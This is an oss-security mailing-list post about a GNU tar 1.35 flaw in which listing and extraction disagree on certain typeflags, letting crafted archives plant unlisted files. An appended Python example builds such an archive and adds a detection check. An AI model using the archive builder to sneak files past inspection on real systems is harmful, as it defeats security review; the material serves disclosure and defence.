Message-ID: <e9445380-c50f-4385-93fb-02fbeec634af@oracle.com>
Date: Sat, 11 Apr 2026 10:10:20 -0700
From: Alan Coopersmith <alan.coopersmith@...cle.com>
To: oss-security@...ts.openwall.com
Subject: GNU tar: listing/extraction desynchronization allows hidden file injection
https://lists.gnu.org/archive/html/bug-tar/2026-03/msg00007.html disclosed:
> From: Guillermo de Angel
> Subject: GNU tar: listing/extraction desynchronization allows hidden file injection (tar -t vs tar -x)
> Date: Wed, 18 Mar 2026 15:55:41 +0100
>
> Hello,
>
> I am reporting a security issue in GNU tar 1.35 where tar -t and tar -x produce
> different results when processing archives containing non-data-bearing typeflags
> (symlink, chardev, blockdev, FIFO) with a non-zero size field.
>
> Summary:
>
> - tar -t respects the size field and skips the data blocks
> - tar -x ignores the size field and parses the data blocks as headers
> - Result: files embedded in the data region are invisible to listing but are
> created on disk during extraction
>
> This enables hidden file injection: an attacker can craft a small archive
> (< 3 KB) where tar -t reports N entries but tar -x creates N+M files.
>
> Any security workflow that relies on tar -t for pre-extraction inspection will
> have an incomplete view of the archive contents.
>
> Reproduction (GNU tar 1.35, Ubuntu 24.04):
>
> $ tar -tf desync_chardev.tar
> carrier_entry
> marker.txt
>
> $ mkdir /tmp/test && tar -xf desync_chardev.tar -C /tmp/test
> $ ls /tmp/test/
> carrier_entry  injected.txt  marker.txt
>                ^^^^^^^^^^^^
>                not in listing
>
> bsdtar 3.7.2 is consistent in both modes (lists and extracts all 3 entries).
>
> Affected typeflags: '2' (symlink), '3' (chardev), '4' (blockdev), '6' (FIFO).
> Typeflag '5' (directory) is not affected.
>
> I have attached:
>
> 1. Full advisory with root cause analysis and impact assessment
> 2. Standalone PoC generator (Python 3, no dependencies)
> 3. Four minimal PoC archives (one per affected typeflag)
>
> I am happy to coordinate on a disclosure timeline. Please let me know if you
> need additional information or testing.
>
> Regards,
>
> Guillermo de Angel
Red Hat appears to have assigned CVE-2026-5704 to this issue.
Paul Eggert provided a patch in
https://lists.gnu.org/archive/html/bug-tar/2026-03/msg00011.html
which is also available in
https://cgit.git.savannah.gnu.org/cgit/tar.git/commit/?id=b8d8a61b25588caca4efaf9bdd2e3f1a49da77e3
https://lists.gnu.org/archive/html/bug-tar/2026-03/msg00012.html points out
that a similar report was also included in
https://lists.gnu.org/archive/html/bug-tar/2026-02/msg00022.html
along with a number of other bug reports.
--
-Alan Coopersmith- alan.coopersmith@...cle.com
Oracle Solaris Engineering - https://blogs.oracle.com/solaris
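The mechanism in the quoted report (a header with a non-data typeflag and a non-zero size field, whose "data" region contains a complete second member) can be modelled in a few dozen lines. The following is an added example written for this page; it is neither the reporter's attached PoC generator nor GNU tar's code, and the two walk policies it implements are a model of the behaviour the report describes, not a transcription of tar's extraction logic. It builds such an archive from constructed sample data, walks it once honoring the size field for every header (the listing view) and once ignoring it for typeflags 2, 3, 4 and 6 (the 1.35 extraction view), and ends with the pre-extraction check a practitioner would want: flag any affected typeflag whose size field is non-zero. Names such as carrier_entry, injected.txt and marker.txt are taken from the report's reproduction; everything else is this example's own.

```python
"""Model of the tar -t / tar -x desynchronization reported for GNU tar 1.35.

Added illustration, not the reporter's PoC generator and not GNU tar code.
"""
import io
import tarfile

BLOCK = 512
# Typeflags the report lists as affected: symlink, chardev, blockdev, FIFO.
AFFECTED = {b"2", b"3", b"4", b"6"}


def octal_field(value: int, width: int) -> bytes:
    """NUL-terminated, zero-padded octal field of `width` bytes (ustar style)."""
    return format(value, "o").rjust(width - 1, "0").encode() + b"\0"


def ustar_header(name: str, typeflag: bytes, size: int) -> bytes:
    """One 512-byte POSIX ustar header block with a correct checksum."""
    hdr = bytearray(BLOCK)
    hdr[0:len(name)] = name.encode()
    hdr[100:108] = octal_field(0o644, 8)   # mode
    hdr[108:116] = octal_field(0, 8)       # uid
    hdr[116:124] = octal_field(0, 8)       # gid
    hdr[124:136] = octal_field(size, 12)   # size: the field the two modes disagree on
    hdr[136:148] = octal_field(0, 12)      # mtime
    hdr[148:156] = b" " * 8                # checksum is computed with this field blank
    hdr[156:157] = typeflag
    hdr[257:263] = b"ustar\0"
    hdr[263:265] = b"00"
    hdr[329:337] = octal_field(0, 8)       # devmajor
    hdr[337:345] = octal_field(0, 8)       # devminor
    hdr[148:156] = octal_field(sum(hdr), 7) + b" "
    return bytes(hdr)


def pad(data: bytes) -> bytes:
    """Pad member data to a whole number of 512-byte blocks."""
    return data + b"\0" * (-len(data) % BLOCK)


def build_desync_archive(typeflag: bytes = b"3") -> bytes:
    """Constructed sample: carrier_entry has a non-data typeflag and a size field
    covering a complete injected.txt member; marker.txt follows as a normal file."""
    hidden = ustar_header("injected.txt", b"0", 7) + pad(b"hidden\n")
    carrier = ustar_header("carrier_entry", typeflag, len(hidden))
    marker = ustar_header("marker.txt", b"0", 8) + pad(b"visible\n")
    return carrier + hidden + marker + b"\0" * (2 * BLOCK)   # end-of-archive blocks


def checksum_ok(hdr: bytes) -> bool:
    """Verify the ustar checksum (sum of all bytes with the field read as spaces)."""
    stored = int(hdr[148:156].split(b"\0", 1)[0], 8)
    return stored == sum(hdr[:148]) + 8 * 0x20 + sum(hdr[156:])


def walk(archive: bytes, honor_size_for_affected: bool) -> list:
    """Return (name, typeflag, size) for every header the walk reaches.

    honor_size_for_affected=True models the listing walk: skip `size` bytes after
    every header. False models the extraction walk the report describes: the data
    region of the affected typeflags is not skipped and is parsed as more headers.
    """
    entries, off = [], 0
    while off + BLOCK <= len(archive):
        hdr = archive[off:off + BLOCK]
        if hdr == b"\0" * BLOCK:          # first all-zero block ends the archive
            break
        if not checksum_ok(hdr):
            raise ValueError("bad header checksum at offset %d" % off)
        name = hdr[:100].split(b"\0", 1)[0].decode()
        typeflag = hdr[156:157]
        size = int(hdr[124:136].split(b"\0", 1)[0], 8)
        entries.append((name, typeflag, size))
        off += BLOCK
        if typeflag not in AFFECTED or honor_size_for_affected:
            off += (size + BLOCK - 1) // BLOCK * BLOCK   # skip the data blocks
    return entries


def list_view(archive: bytes) -> list:
    return [e[0] for e in walk(archive, True)]


def extract_view(archive: bytes) -> list:
    return [e[0] for e in walk(archive, False)]


def suspicious_entries(archive: bytes) -> list:
    """Pre-extraction check: an affected typeflag with a non-zero size field is
    exactly the construct that makes the two views diverge."""
    return [e for e in walk(archive, True) if e[1] in AFFECTED and e[2] != 0]


if __name__ == "__main__":
    arc = build_desync_archive(b"3")
    print("listing view   :", list_view(arc))
    print("extraction view:", extract_view(arc))
    print("suspicious     :", suspicious_entries(arc))
    # For comparison, the member names the stdlib tarfile reader yields for the same bytes.
    with tarfile.open(fileobj=io.BytesIO(arc), mode="r:") as tf:
        print("tarfile module :", tf.getnames())
```

The check in suspicious_entries is what a pre-extraction gate should run in addition to, not instead of, a listing: a symlink, device node or FIFO header legitimately has no data, so a non-zero size field on one is either a writer bug or an attempt at exactly this injection, and the archive should be rejected rather than extracted. The safer long-term fix is the upstream patch, which makes extraction and listing agree on how such headers are consumed.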